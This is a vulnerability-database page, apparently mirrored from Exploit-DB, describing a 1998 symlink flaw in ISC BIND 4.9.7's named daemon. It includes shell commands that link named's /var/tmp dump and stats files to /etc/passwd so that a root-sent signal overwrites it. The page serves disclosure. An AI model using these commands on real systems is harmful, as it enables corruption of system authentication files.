Lucene search
+L

ISC BIND 4.9.7 -T1B - named SIGINT / SIGIOT Symlink

🗓️ 10 Apr 1998 00:00:00Reported by Joe HType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

BIND 4.9.7 allows file overwrites via SIGINT/SIGIOT without symlink checks, impacting security.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-1999-1499
12 Sep 200104:00
cve
cvelist
Cvelist
CVE-1999-1499
12 Sep 200104:00
cvelist
euvd
EUVD
EUVD-1999-1480
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-1499
10 Apr 199804:00
nvd
source: https://www.securityfocus.com/bid/80/info

The named daemon will dump the named database to /var/tmp/named_dump.db
when it receives a SIGINT signal. It does not check for symbolic links while
doing so and can be made to overwrite any file in the system.

The named daemons will append named statistics to /var/tmp/named.stats
when it receives a SIGIOT signal. It does not check for symbolic links while
doing so and ca be made to append to any file in the system.

BIND 8.1.x is not vulnerable as it uses a private directory specified in
named.{boot,conf} for temporary and debug dumps.

$ ls -l /var/tmp/named_dump.db
/var/tmp/named_dump.db not found
$ ls -l /var/tmp/named.stats
/var/tmp/named.stats not found
$ ln -s /etc/passwd /var/tmp/named_dump.db
$ ln -s /etc/passwd /var/tmp/named.stats

[ wait for root to send a SIGINT or SIGIOT to named ]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jun 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00694
28